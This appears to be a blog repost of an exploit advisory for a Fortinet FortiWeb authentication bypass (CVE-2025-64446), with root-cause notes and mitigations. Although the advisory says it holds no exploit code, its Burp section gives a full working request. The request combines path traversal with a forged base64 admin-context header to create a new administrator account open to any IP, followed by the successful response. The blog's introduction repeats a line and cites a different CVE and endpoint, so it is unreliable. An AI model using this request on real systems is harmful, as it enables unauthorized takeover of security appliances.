Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Fortinet FortiWeb 8.0.0 Authentication Bypass

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 46
Fortinet FortiWeb 8.0.0 (and earlier 7.x versions) suffered from CVE-2023-44251,
a Fortinet FortiWeb 8.0.0 (and earlier 7.x versions) suffered from CVE-2023-44251,
a critical authentication bypass vulnerability.
This flaw allowed an unauthenticated attacker to gain administrative access.
It was a directory traversal vulnerability.
Attackers exploited a path traversal in the `username` parameter
via a crafted HTTP request to `/api/v2/admin/session/auth`.
This bypassed authentication, granting an administrative session.
Impact: full control over the WAF appliance.
Patched in FortiWeb 7.0.7, 7.2.3, and 8.0.1.
Immediate upgrade is strongly recommended.

# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446
# Author: nu11secur1ty
# Date: 11/17/2025
# Vendor: https://www.fortinet.com/
# Software: v8.0.0
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446

## Description:
## Overview
This document provides a **research?grade analysis** of CVE?2025?64446, an
authentication bypass vulnerability discovered in Fortinet FortiWeb
appliances.
It is intended *only* for academic, defensive security testing in
controlled lab environments.

- No exploit code is included in this document.

---

## Vulnerability Summary
CVE?2025?64446 enables an attacker to interact with administrative API
endpoints **without valid authentication**, due to improper trust
validation in a CGI parsing flow.

A malicious request can trigger the backend logic responsible for
administrative actions, bypassing permission checks.

Impact includes:
- Unauthorized access to sensitive endpoints
- Potential privilege escalation
- Unauthorized configuration changes
- Administrative user creation

---

## Root Cause (High?Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a
crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Failure in validating serialized/encoded CGI metadata.

This combination enabled unauthorized execution of administrative actions.

---

## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin?level
operations.

Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json

{
"status": "success",
"code": 0,
"message": "Operation completed"
}
```

---

## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical
payloads**:

1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative
success.
5. Capture response artifacts for documentation.

Researchers should generate their own payloads in private lab environments.


## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO:
eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive

{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin",
"access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6":
"::/0", "last-name": "", "first-name": "", "email-address": "",
"phone-number": "", "mobile-number": "", "hidden": 0, "comments": "",
"sz_dashboard": -1, "type": "local-user", "type_val": "0",
"admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val":
"0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0,
"history-password0": "", "history-password1": "", "history-password2": "",
"history-password3": "", "history-password4": "", "history-password5": "",
"history-password6": "", "history-password7": "", "history-password8": "",
"history-password9": "", "force-password-change": "disable",
"force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src
'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src
'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self';
upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1,
"name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val":
"1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name":
"", "first-name": "", "email-address": "", "phone-number": "",
"mobile-number": "", "hidden": 0, "domains": "root ",
"gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "",
"sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val":
"0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX",
"wildcard": "disable", "wildcard_val": "0", "accprofile-override":
"disable", "accprofile-override_val": "0", "fortiai": "disable",
"fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695,
"history-password-pos": 1, "history-password0": "ENC XXXX",
"history-password1": "ENC XXXX", "history-password2": "ENC XXXX",
"history-password3": "ENC XXXX", "history-password4": "ENC XXXX",
"history-password5": "ENC XXXX", "history-password6": "ENC XXXX",
"history-password7": "ENC XXXX", "history-password8": "ENC XXXX",
"history-password9": "ENC XXXX", "force-password-change": "disable",
"force-password-change_val": "0", "feature-info-ver": "" } }
```
---

## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Disable exposed management interfaces from public networks.
- Enforce strict role?based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.

---

## Ethical Notice
This documentation is for **defensive research only**.
Please don't test systems you do not own or have explicit permission to
assess.



# Reproduce:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)

# Demo:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)

# Time spent:
03:00:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>

Social Media Share